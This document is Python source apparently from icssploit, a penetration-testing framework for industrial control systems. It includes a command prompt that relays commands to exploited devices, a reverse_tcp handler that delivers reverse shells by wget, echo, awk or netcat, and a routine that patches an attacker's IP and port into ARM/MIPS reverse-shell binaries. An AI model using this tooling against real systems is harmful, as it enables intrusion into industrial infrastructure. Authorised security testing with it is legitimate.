def shell(exploit, architecture="", method="", **params):
    """Run an interactive ``cmd >`` prompt on top of ``exploit.execute``.

    Each line typed by the operator is handled as follows:

    * ``quit`` / ``exit`` leaves the loop and returns ``None``.
    * ``reverse_tcp <reverse ip> <port>`` builds a ``reverse_shell`` helper
      and calls the delivery routine selected by ``method``.
    * anything else (including an empty line) is passed unchanged to
      ``exploit.execute`` and the result is printed.

    ``params`` supplies the keyword values each delivery routine reads:
    ``binary`` and ``location`` for "wget"/"echo", ``binary`` for "awk",
    ``binary`` and ``shell`` for "netcat".  A missing key raises ``KeyError``.
    """
    while True:
        # Spin until pending output has been drained so the prompt is not
        # interleaved with earlier messages.
        while not printer_queue.empty():
            pass

        line = raw_input("cmd > ")
        if line in ("quit", "exit"):
            return

        tokens = line.split()
        if not tokens or tokens[0] != "reverse_tcp":
            # The line is forwarded verbatim; no filtering happens here.
            print_info(exploit.execute(line))
            continue

        if len(tokens) != 3:
            print_error("reverse_tcp <reverse ip> <port>")
            continue

        # NOTE(review): host and port are taken as typed; any validation
        # would have to happen inside reverse_shell, which is not visible here.
        _, lhost, lport = tokens
        revshell = reverse_shell(exploit, architecture, lhost, lport)

        if method == "wget":
            revshell.wget(binary=params['binary'],
                          location=params['location'])
        elif method == "echo":
            revshell.echo(binary=params['binary'],
                          location=params['location'])
        elif method == "awk":
            revshell.awk(binary=params['binary'])
        elif method == "netcat":
            revshell.netcat(binary=params['binary'],
                            shell=params['shell'])
        else:
            print_error("Reverse shell is not available")
def command_show(self, *args, **kwargs):
    """Dispatch ``show <sub-command>`` to the matching ``_show_*`` method.

    The first positional argument names the sub-command; the handler is the
    attribute ``_show_<sub-command>`` on this object and receives the same
    positional and keyword arguments.
    """
    sub_command = args[0]
    handler_name = "_show_{}".format(sub_command)
    try:
        # The call stays inside the try block: an AttributeError raised by
        # the handler itself is reported the same way as a missing handler.
        handler = getattr(self, handler_name)
        handler(*args, **kwargs)
    except AttributeError:
        utils.print_error("Unknown 'show' sub-command '{}'. "
                          "What do you want to show?\n"
                          "Possible choices are: {}".format(
                              sub_command, self.show_sub_commands))
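def command_run(self, *args, **kwargs):
    """Run the currently selected module and report how it ended.

    Ctrl-C during the run is reported as a user cancellation.  Any other
    exception raised by the module is caught and its traceback is printed
    through ``utils.print_error``; nothing is re-raised to the caller.
    """
    utils.print_status("Running module...")
    try:
        self.current_module.run()
    except KeyboardInterrupt:
        utils.print_info()
        utils.print_error("Operation cancelled by user")
    except:  # noqa: E722
        # NOTE(review): the bare except also traps SystemExit; it is kept so
        # callers see the same behaviour as before.
        # format_exc() formats the exception being handled by itself. Its
        # only positional parameter is `limit`, so passing the exc_info
        # tuple (as the previous code did) is not a valid argument.
        utils.print_error(traceback.format_exc())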
def command_unsetg(self, *args, **kwargs):
    """Remove one entry from ``GLOBAL_OPTS``.

    ``args[0]`` is the text after the command; everything up to the first
    space is the option name.  The text after that space is only echoed back
    on success; it is not the value that was stored.
    """
    key, _, value = args[0].partition(' ')
    try:
        del GLOBAL_OPTS[key]
    except KeyError:
        utils.print_error("You can't unset global option '{}'.\n"
                          "Available global options: {}".format(
                              key, GLOBAL_OPTS.keys()))
        return
    utils.print_success({key: value})
def command_use(self, module_path, *args, **kwargs):
    """Load the module named by ``module_path`` and make it current.

    The path is converted with ``utils.pythonize_path``.  Paths that do not
    start with ``extra_`` are additionally placed under ``icssploit.modules``.
    The result is imported through ``utils.import_exploit`` and instantiated.
    An ``icssploitException`` is printed instead of propagating, and
    ``self.current_module`` is then left unchanged.
    """
    # Decide on the prefix from the path as typed, before it is converted.
    is_extra = module_path.startswith("extra_")
    module_path = utils.pythonize_path(module_path)
    if not is_extra:
        module_path = '.'.join(('icssploit', 'modules', module_path))
    # NOTE(review): "extra_" paths are imported without the package prefix,
    # so the import target is whatever the typed path resolves to.  What
    # import_exploit accepts is not visible here; confirm it restricts the
    # lookup.
    try:
        module_class = utils.import_exploit(module_path)
        self.current_module = module_class()
    except icssploitException as err:
        utils.print_error(err.message)
def command_set(self, *args, **kwargs):
    """Assign an option on the current module.

    ``args[0]`` is split at the first space into option name and value.  The
    name must be listed in ``self.current_module.options``; otherwise an
    error with the available options is printed and nothing is changed.
    With ``glob=True`` the pair is also stored in ``GLOBAL_OPTS``.
    """
    key, _, value = args[0].partition(' ')

    if key not in self.current_module.options:
        utils.print_error("You can't set option '{}'.\n"
                          "Available options: {}".format(
                              key, self.current_module.options))
        return

    # The value is stored as the raw string from the command line; any
    # conversion or validation is up to the module attribute itself.
    setattr(self.current_module, key, value)
    if kwargs.get("glob", False):
        GLOBAL_OPTS[key] = value
    utils.print_success({key: value})
def command_check(self, *args, **kwargs):
    """Call the current module's ``check()`` and print the outcome.

    ``True`` is reported as vulnerable and ``False`` as not vulnerable.  Any
    other return value is reported as "could not be verified".  An exception
    raised by ``check()`` is printed as an error and not re-raised.
    """
    try:
        verdict = self.current_module.check()
    except Exception as error:
        utils.print_error(error)
        return

    # Identity comparison on purpose: truthy non-bool results fall through
    # to the "could not be verified" branch.
    if verdict is True:
        utils.print_success("Target is vulnerable")
    elif verdict is False:
        utils.print_error("Target is not vulnerable")
    else:
        utils.print_status("Target could not be verified")
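def command_search(self, *args, **kwargs):
    """Print every known module whose path contains the keyword.

    Matching is case-insensitive against the entries of ``self.modules``.
    Each hit is printed in its ``utils.humanize_path`` form with the matched
    text wrapped in the ANSI red escape sequence.  An empty keyword prints a
    usage hint and returns.
    """
    keyword = args[0]
    if not keyword:
        utils.print_error(
            "Please specify search keyword. e.g. 'search plc'")
        return

    needle = keyword.lower()
    for module in self.modules:
        if needle not in module.lower():
            continue

        readable = utils.humanize_path(module)
        # Locate the hit case-insensitively as well.  The previous
        # case-sensitive partition() found nothing when the keyword's case
        # differed from the path, so the highlight was silently dropped.
        start = readable.lower().find(needle)
        if start < 0:
            # The keyword matched only the raw path form; print the entry
            # without a highlighted section.
            head, hit, tail = readable, "", ""
        else:
            end = start + len(needle)
            head, hit, tail = (readable[:start], readable[start:end],
                               readable[end:])
        utils.print_info("{}\033[31m{}\033[0m{}".format(head, hit, tail))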
def generate_binary(self, lhost, lport):
    """Build ``self.revshell`` for ``self.arch`` from the stored template.

    A fresh 8-character ``self.binary_name`` is chosen, ``lhost`` and
    ``lport`` are converted with ``self.convert_ip`` / ``self.convert_port``,
    and the converted values replace fixed byte ranges of the template for
    the 'arm', 'mipsel' or 'mips' architecture.

    NOTE(review): for any other architecture only an error is printed.
    ``self.revshell`` keeps whatever value it had before the call, so callers
    should not assume it was regenerated.
    """
    print_status("Generating reverse shell binary")
    self.binary_name = random_text(8)
    ip = self.convert_ip(lhost)
    port = self.convert_port(lport)

    arch = self.arch
    if arch == 'arm':
        template = self.arm
        self.revshell = (template[:0x104] + ip +
                         template[0x108:0x10a] + port +
                         template[0x10c:])
    elif arch == 'mipsel':
        # The address is written as two separate halves, second half first.
        template = self.mipsel
        self.revshell = (template[:0xe4] + port +
                         template[0xe6:0xf0] + ip[2:] +
                         template[0xf2:0xf4] + ip[:2] +
                         template[0xf6:])
    elif arch == 'mips':
        # The address is written as two separate halves, first half first.
        template = self.mips
        self.revshell = (template[:0xea] + port +
                         template[0xec:0xf2] + ip[:2] +
                         template[0xf4:0xf6] + ip[2:] +
                         template[0xf8:])
    else:
        print_error("Platform not supported")
def start(self):
    """ icssploit main entry point: print the banner, then loop on the prompt.

    Each line is split by ``self.parse_line`` into a command and its
    argument string, and the handler returned by
    ``self.get_command_handler`` is called with that string.  Blank commands
    are skipped.  ``icssploitException`` is printed and the loop continues;
    Ctrl-C prints an empty line and continues; end-of-input stops the
    interpreter.  Any other exception is not caught here and ends the loop.
    """
    utils.print_info(self.banner)
    printer_queue.join()

    while True:
        try:
            command, args = self.parse_line(raw_input(self.prompt))
            if command:
                self.get_command_handler(command)(args)
        except icssploitException as err:
            utils.print_error(err)
        except EOFError:
            utils.print_info()
            utils.print_status("icssploit stopped")
            break
        except KeyboardInterrupt:
            utils.print_info()
        finally:
            # Wait for queued output before the next prompt, or before
            # leaving the loop.
            printer_queue.join()